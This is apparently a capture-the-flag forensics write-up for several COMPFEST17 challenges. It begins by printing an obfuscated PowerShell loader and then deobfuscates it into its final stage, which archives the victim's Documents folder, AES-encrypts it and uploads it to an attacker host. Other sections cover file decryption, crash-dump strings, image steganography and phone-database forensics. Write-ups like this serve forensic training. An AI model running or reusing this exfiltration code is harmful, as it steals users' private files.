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yk3LicpNw4jOQ9ZNAc0Hjc5NFU0OT1fNBcgAwkpI1Q0BzQVNDkgKjcpIwUkByQEIxcjBCQ5NxcOOTkGCQc0Hw4pNyw7ByMEOyk3HiApN18kKT0EJwc3IDs5Ig4nFwxZJAcjWCc5Nxk4FzdcJCkjFSQXICQnKT4aPDkgGyQ5NAcOBw9YDikiFA4XI1oOByFfDjkjBQkpIwoJFyAXDgcgCwk5IAEJFyAaDgc3HTQ5Nxc3FzwGNxc0ADcHNDo3Bw4FNzkiBzQpIlk3OTVeNAcjDjc5I0Y0FzxdNBcgNTcHIBQ0OScVNDk0IDs5Igc7Bz9ZOBcjNDsHIz87BztcOCkjWTgXIEY4Bz0UODkgJDspIAU4KT0APzk3XjwpNx8/Fw8HPwc0OT85NAY8OSdYPCkiKT8XIyQ/KQtfPDkjAj8pI1s/FzgXPAcgJD85IDQ/OQlYICkiBSMXI1kjFwlfIDkjPyMpI14gFw4XIAcgFSA5IBojOSMaIBcjBiQpNyIjByQUPDkgHz85IkY0OThYNDkiHjw5Ijg/BwlYPAcgKj8HIBc8Fz4UPAcgPz8HIBo8Bz4VPDkgBD85IAk/KTQVPDkgJT85IAE8KQwVPDkgFD85IAA/ByYVPDkgLj85IF48OToVPDkgVD8pI14nFydUICUnSkpFCgMEHxk+WVsIHgwvAAIfK1dXMBkfCBsDAi5DAAgZHhQ+NkUKAwQfGT4ZCCpDVSs5OFdXMAoDBAkCDgMoQxkVCDlDAAgZHhQ+NkpWSR82QFxDQ0BFSR9DIQgDChkFRDBNQAcCBANNSkpNEU0ECBU=';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd

The above code can be simplified to:

powershell

1$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd

By changing the iex at the end to Write-Host, we can make the script output the decrypted result:

powershell

1$x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};Write-Host $rd

Running it gives:

powershell

1$r ='...' | iex

By removing the | iex part layer by layer and re-running the script, we eventually deobfuscate it to the final layer:

powershell

1$AAAAAAAAAAAAAABBBBBIIIiiAB='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&()_+-=[]{}~';$aadsfjkh=-join((1..15)|ForEach{$AAAAAAAAAAAAAABBBBBIIIiiAB[(Get-Random -Maximum $AAAAAAAAAAAAAABBBBBIIIiiAB.Length)]});$fnsdadkj="$env:TEMP\$aadsfjkh.zip";$cvmz="$env:TEMP\$aadsfjkh.enc";try{Get-ChildItem "$env:USERPROFILE\Documents" -Recurse -File|Where-Object{-not $_.PSIsContainer -and $_.Name -notlike "*transcript*" -and $_.Name -notlike "*.tmp"}|Compress-Archive -DestinationPath $fnsdadkj -CompressionLevel Fastest -ErrorAction SilentlyContinue;if(Test-Path $fnsdadkj){$pqoero=New-Object byte[] 16;$dma=New-Object byte[] 16;$zfsfdm=[System.Security.Cryptography.RNGCryptoServiceProvider]::Create();$zfsfdm.GetBytes($pqoero);$zfsfdm.GetBytes($dma);$zfsfdm.Dispose();$dmafnaas=[System.Security.Cryptography.Aes]::Create();$dmafnaas.Key=$pqoero;$dmafnaas.IV=$dma;$encryptor=$dmafnaas.CreateEncryptor();$dfnalkns=[System.IO.File]::ReadAllBytes($fnsdadkj);$agbaghb=$encryptor.TransformFinalBlock($dfnalkns,0,$dfnalkns.Length);$dmafnaas.Dispose();$combinedBytes=$pqoero+$agbaghb+$dma;[System.IO.File]::WriteAllBytes($cvmz,$combinedBytes);Remove-Item $fnsdadkj -Force -ErrorAction SilentlyContinue;iwr -Uri "http://192.168.18.76:8080/upload" -Method Post -InFile $cvmz -ContentType "application/octet-stream" -Headers @{"X-Filename"=(Split-Path $cvmz -Leaf)} -ErrorAction SilentlyContinue|Out-Null;if(Test-Path $cvmz){Remove-Item $cvmz -Force -ErrorAction SilentlyContinue}}}catch{}

The file transferred to /upload can be extracted from the traffic capture. This is the ciphertext.

We can write a Python script to recover this file:

Read the .enc file.
Split the file into three parts: the first 16 bytes are the Key, the last 16 bytes are the Initialization Vector (IV), and the middle part is the encrypted data.
Use the extracted Key and IV to perform AES decryption on the encrypted data.
Remove the padding from the end of the decrypted data.
Save the final plaintext data as a .zip file.

python

1from Crypto.Cipher import AES2from Crypto.Util.Padding import unpad3import sys4 5# --- Configuration ---6encrypted_file_path = "upload"7decrypted_zip_path = "decrypted.zip"8# ---------------------9 10def decrypt_file():11    """Reads the .enc file, extracts Key/IV, decrypts, and saves the original .zip file."""12    13    print(f"[*] Reading the encrypted file: '{encrypted_file_path}'")14 15    with open(encrypted_file_path, "rb") as f:16        full_data = f.read()17 18    # Step 1: Extract the Key, IV, and Ciphertext from the file structure19    key = full_data[:16]20    iv = full_data[-16:]21    ciphertext = full_data[16:-16]22    23    print("[+] File components extracted successfully.")24    print(f"    -> AES Key (HEX): {key.hex()}")25    print(f"    -> AES IV (HEX):  {iv.hex()}")26 27    try:28        # Step 2: Create an AES cipher object in CBC mode29        cipher = AES.new(key, AES.MODE_CBC, iv)30        31        # Step 3: Decrypt the ciphertext and unpad it (PKCS7 padding is default)32        decrypted_padded_data = cipher.decrypt(ciphertext)33        original_data = unpad(decrypted_padded_data, AES.block_size)34 35    except Exception as e:36        print(f"\n[!] An unexpected error occurred during decryption: {e}")37        sys.exit(1)38        39    # Step 4: Save the decrypted bytes to a .zip file40    with open(decrypted_zip_path, "wb") as f:41        f.write(original_data)42 43if __name__ == "__main__":44    decrypt_file()

After decompressing the zip file, the flag is found inside a PDF file.

FLAG

text

1COMPFEST17{powershell_script_logging_is_very_powerfull_b4ffdc5da5}

crash out

Challenge

Evan installed and executed a supposedly safe file. It caused his laptop to hang, several data to become corrupted, and new password-protected files to show up. The password popped up for a while, but I didn’t memorize it. Can you get me back my file?

Solution

First, I mounted the image using FTK as the F drive.

I started by finding a genuinely encrypted zip file at F:\Users\Evan\Documents\89a0b289f0221.zip, but I couldn’t figure out the password.

Then, I located the file F:\Users\Evan\Downloads\upload_queue\file.enc. The strange thing about this file was that its header was that of a JPG, but it couldn’t be opened correctly after changing the extension to .jpg. This led me to suspect it was encrypted.

Next, I found a suspicious file: F:\ProgramData\Dumps\chrome_updater.exe.34368.dmp. Attempting to open it with WinDbg resulted in an error, so I resorted to analyzing the strings within it.

Searching for 89a0b289f0221.zip or file.enc inside the dump led me to this line:

text

1C:\\Users\\Evan\\Documents\\89a0b289f0221.zip whereourcrashis --flag= --crash= null div raise --wait= --path= C:\\Users\\Evan\\Downloads\\upload_queue\\file.enc chrome_updater.exe

chrome_updater.exe: This is the executed program. Based on its name, it’s likely an updater for a Chromium-based application, which fits the challenge description of a “supposedly safe file”.
—crash= null div raise: This parameter explicitly instructs the program to perform an operation that will cause a crash.
- null: Likely represents a “null pointer dereference”.
- div: Likely represents a “division-by-zero error”.
- raise: Likely represents “throwing an exception”.
whereourcrashis: This string is very colloquial, like a comment left by a developer. This ties into the theme of the challenge, not only confirming that this file is essential to the solution but also suggesting that the string itself will be very useful later.

I then tried to find chrome_updater.exe for reverse engineering but couldn’t locate it. However, during the search, I found a related Windows Error Reporting (WER) file: F:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_chrome_updater.e_7b71673944fedcfebbd880da83474929a7d18741_38b31a53_7dfb28da-126b-49f8-a06-216c4072ac0a\Report.wer. It contained the following content:

text

1EventType=APPCRASH2...3Sig[6].Name=Exception Code4Sig[6].Value=c00000055...

EventType=APPCRASH: The event type is an application crash.
Sig[6].Name=Exception Code; Sig[6].Value=c0000005: c0000005 is the Windows exception code for an access violation. The most common cause of this exception is a null pointer dereference—that is, the program attempted to read from or write to a NULL memory address.

This matched my earlier speculation, confirming that chrome_updater.exe, 89a0b289f0221.zip, and file.enc are highly relevant files for this challenge. The meaningful string whereourcrashis from the command line is also very likely related.

Connecting the dots—I couldn’t find the password for 89a0b289f0221.zip, and the string whereourcrashis appeared right next to the zip file in the command—it was reasonable to infer that whereourcrashis was the password for 89a0b289f0221.zip. Trying it confirmed this suspicion.

After decompressing 89a0b289f0221.zip, I obtained a script for file encryption named script.py, with the following content:

python

1import sys2import hashlib3import getpass4 5HEADER_SIZE = 166def derive_key(password: str, length: int = 32) -> bytes:7    return hashlib.sha256(password.encode()).digest()[:length]8 9def transform(byte, key_byte, i):10    xored = byte ^ key_byte11    rotation = i % 312    return ((xored << rotation) | (xored >> (8 - rotation))) & 0xFF13 14def encrypt(input_file, output_file, password):15    key = derive_key(password)16 17    with open(input_file, 'rb') as f:18        data = f.read()19 20    encrypted = bytearray(data[:HEADER_SIZE])21 22    for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE):23        key_byte = key[i % len(key)] ^ (i & 0x0F)24        encrypted.append(transform(byte, key_byte, i))25 26    with open(output_file, 'wb') as f:27        f.write(encrypted)28 29    print(f"Encrypted {input_file} -> {output_file}")30 31if __name__ == "__main__":32    if len(sys.argv) != 4:33        print("Usage:")34        print("python3 script.py encrypt input.jpg output.enc")35        sys.exit(1)36 37    mode, input_file, output_file = sys.argv[1:4]38    password = getpass.getpass("Enter password: ")39 40    if mode == "encrypt":41        encrypt(input_file, output_file, password)42    else:43        print("Invalid")

I noticed the usage example was python3 script.py encrypt input.jpg output.enc. Considering the file.enc I had found, it was highly probable that it was encrypted by this very script. Therefore, I wrote a corresponding decryption script:

python

1import sys2import hashlib3import getpass4 5HEADER_SIZE = 166 7def derive_key(password: str, length: int = 32) -> bytes:8    """与加密脚本完全相同的密钥派生函数。"""9    return hashlib.sha256(password.encode()).digest()[:length]10 11def untransform(byte, key_byte, i):12    """13    这是 transform 函数的逆函数。14    1. 计算旋转位数。15    2. 执行循环右移（ROR），这是循环左移（ROL）的逆操作。16    3. 执行异或（XOR），这是其自身的逆操作。17    """18    rotation = i % 319    # 循环右移 (ROR)20    rotated_byte = ((byte >> rotation) | (byte << (8 - rotation))) & 0xFF21    # 异或 (XOR)22    original_byte = rotated_byte ^ key_byte23    return original_byte24 25def decrypt(input_file, output_file, password):26    key = derive_key(password)27 28    with open(input_file, 'rb') as f:29        data = f.read()30 31    # 解密文件的前16字节头部是原文，直接复制32    decrypted = bytearray(data[:HEADER_SIZE])33 34    # 从第17个字节（索引16）开始循环解密35    for i, byte in enumerate(data[HEADER_SIZE:], start=HEADER_SIZE):36        # 1. 生成与加密时完全相同的 key_byte37        key_byte = key[i % len(key)] ^ (i & 0x0F)38        39        # 2. 调用逆向转换函数40        decrypted_byte = untransform(byte, key_byte, i)41        decrypted.append(decrypted_byte)42 43    with open(output_file, 'wb') as f:44        f.write(decrypted)45 46    print(f"Decrypted {input_file} -> {output_file}")47 48if __name__ == "__main__":49    if len(sys.argv) != 4:50        print("Usage:")51        print("python3 script.py decrypt input.enc output.jpg")52        sys.exit(1)53 54    mode, input_file, output_file = sys.argv[1:4]55    password = getpass.getpass("Enter password: ")56 57    if mode == "decrypt":58        decrypt(input_file, output_file, password)59    else:60        print("Invalid mode. Use 'decrypt'.")

Both encryption and decryption require a password. So far, the only password-like string I had encountered was whereourcrashis. I used it to decrypt file.enc, and as expected, it successfully decrypted into a JPG image.

There was only the image with no other information, so I suspected steganography. While checking the image’s EXIF information, I found a clue:

text

1Exif Image Width                : 10802Exif Image Height               : 1080

The EXIF information indicated the image dimensions were 1080x1080, but the actual size of the image was 1080x1024. This was clearly a case of JPG height/width steganography. After correcting the height, the flag was revealed at the bottom of the image.

FLAG

text

1COMPFEST17{cr4sh1ng_1nt0_th3_v0001d_b00m_boOm_B00M!!_b51a77934b}

Mr & Mrs Smith

Challenge

A couple in our office has been rather suspicious these past few weeks, though I cant do much as the guy’s father hold an authorative position. A few days ago he asked me to help back up his phone, and I managed to keep several information just in case I find something to prove my suspicions. Hmm, what does he usually do with his phone?

Chall: https://drive.google.com/drive/folders/1mM3LckA_NZ5O-NskteQOE_8V-R7_g-Dk?usp=sharing

Zip password : 2a07b93ef0362ba7286d536ac1e16c17

Solution

In the SQLite Files section, by sorting by modification date in descending order, we can see that only two files were modified in 2025: bugle_db.db on 2025-08-20, and calendar.db on 2025-08-12.

The bugle_db.db file stores the phone’s SMS messages. Let’s examine it for any useful information.

In the message_text table, the following conversation was found:

text

1Hey, did you finish documenting the warehouse issues?2Yes, I have all the photos and safety violation reports ready3Perfect. The board meeting is next week, we need to be ready4I know. Dad's going to be furious but people could get seriously hurt5The chemical storage violations alone could kill someone6I uploaded everything to our secure drive7Which one? We have multiple backup locations8We upload our work here: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing9Great! What's the access code again?10It's encrypted with the date of our first date-location, like 23122025-londonbridge11Got it! The evidence package is solid. All papers, financial docs, everything. I'm pretty shocked to hear that you remember our anniversary.12Yeah, I always keep a reminder of important dates and events on my phone. Anyways, I know this is hard with your family situation, but we're doing the right thing13Agreed. I'll submit to the regulatory board next week14Thanks for having my back on this. The safety violations are too serious to ignore15Always. We have to protect the workers, even if it costs us our jobs16The photos from the scanner app should be the final piece we need17Perfect. See you at our usual spot later to go over the timeline?18Yes. Same time as our anniversary dinner reservation 😉19How was work today sweetie?20Busy as usual. Lots of documentation work21Don't work too hard! Remember family dinner Sunday22Wouldn't miss it mom ❤️23Thanks for dinner last night! Love you ❤️24Poker night this Friday?25Can't this week, working on a big project26Everything OK? You've been busy lately27Just some important stuff at work. Rain check?28Game night tomorrow at 8?29Safety inspection results are in30When can we discuss them?31Let's schedule something private32Agreed. Too many ears in the office33Meeting moved to 2 PM34Want to grab lunch today?35Can't today, buried in paperwork36You've been stressed lately. Everything OK?37Just work stuff. Nothing I can't handle38Coffee later?39The quarterly reports are due next week40I'm working on the safety compliance section41Make sure everything is thoroughly documented42Project update needed ASAP43Hey go and watch this https://youtu.be/eVpKuSGM_-E?si=SJn01Vi5Aw-bQJPm44What's that45Something important46Package delivery attempted47I wasn't expecting anything48Your package has been delivered49John, we need to discuss the safety audit results50Of course. When would be convenient?51Tomorrow morning, 8 AM sharp. Don't be late52I'll be there sir53And John... keep this between us for now

A Google Drive link is mentioned in the conversation: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing

Inside this Google Drive folder, an encrypted file named classified.pdf.gpg was found.

From the conversation, we can also gather the following information:

The couple is not having an affair; they are actually whistleblowers. They are secretly collecting evidence of serious safety violations in the company’s warehouse and plan to submit it to the regulatory board next week to protect the workers. The man’s father is a high-ranking executive in the company, which adds significant pressure and risk to their investigation, explaining their need for secrecy.

"Great! What's the access code again?" "It's encrypted with the date of our first date-location, like 23122025-londonbridge" This exchange reveals the password format for the file in Google Drive: DDMMYYYY-locationname. The location format is all lowercase with no spaces (e.g., londonbridge). The next step is to find the date and location of their first date.

"I'm pretty shocked to hear that you remember our anniversary." "Yeah, I always keep a reminder of important dates and events on my phone. These two lines imply that the date of their first date is recorded on the phone. Following this lead, we’ll now examine calendar.db.

In record #16 of the Event table, we find an “Anniversary” event with the description We started dating, and took a picture to commemorate it. The dtstart timestamp is 1583193600000, and the eventTimezone is America/New_York. Converting this timestamp gives us the date March 3, 2020. This provides the first part of the password: 03032020.

Following the clue from the record, “took a picture to commemorate it,” we now look for the photo. By filtering the images for a modification date between March 2, 2020, and March 4, 2020, we find a single image:

Below is its EXIF information:

text

1...2Software                        : Our first date3Modify Date                     : 2020:03:03 14:30:004Date/Time Original              : 2020:03:03 14:30:005Create Date                     : 2020:03:03 14:30:006...7GPS Latitude                    : 40 deg 47' 6.32" N8GPS Longitude                   : 73 deg 58' 5.82" W9GPS Position                    : 40 deg 47' 6.32" N, 73 deg 58' 5.82" W

Next, searching for 40°47'06.3"N 73°58'05.8"W on Google Maps reveals that the photo was taken in Central Park:

Therefore, the second part of the password is centralpark. Combining both parts, the full password is 03032020-centralpark.

Next, we use the password 03032020-centralpark to decrypt the classified.pdf.gpg file:

cmd

1┌──(kali㉿kali)-[~/Desktop]2└─$ gpg --decrypt classified.pdf.gpg > classified.pdf

The flag is found in the decrypted classified.pdf file.

FLAG

text

1COMPFEST17{p4rtners_wh0_w0rk_t0gether_t00_w3ll_5b3c71c672}

Update Required

Challenge

A researcher in Mondstadt’s tech division received an urgent-looking HTML file, claiming to be a critical security patch. Trusting its source, they executed antivirus.exe and moments later, a secret PDF file disappeared.

The PDF contained a confidential override PIN tied to the Vision Distribution Network. To protect it, the researcher locked the PDF with their wallet’s seed phrase (exported from a Chrome extension), joined with an underscore (_) as the password.

Although the wallet vault file remains on disk, the password to unlock it has since been lost. Fortunately, there’s a lead: the researcher once copied the vault password to clipboard.

Chall: https://drive.google.com/drive/folders/1R1psX7e04W1aJXFHK_WbNkRt5ukFXOlc?usp=sharing

Zip password : soalinigasusahkokxixixixi

Solution

TBD

FLAG

TBD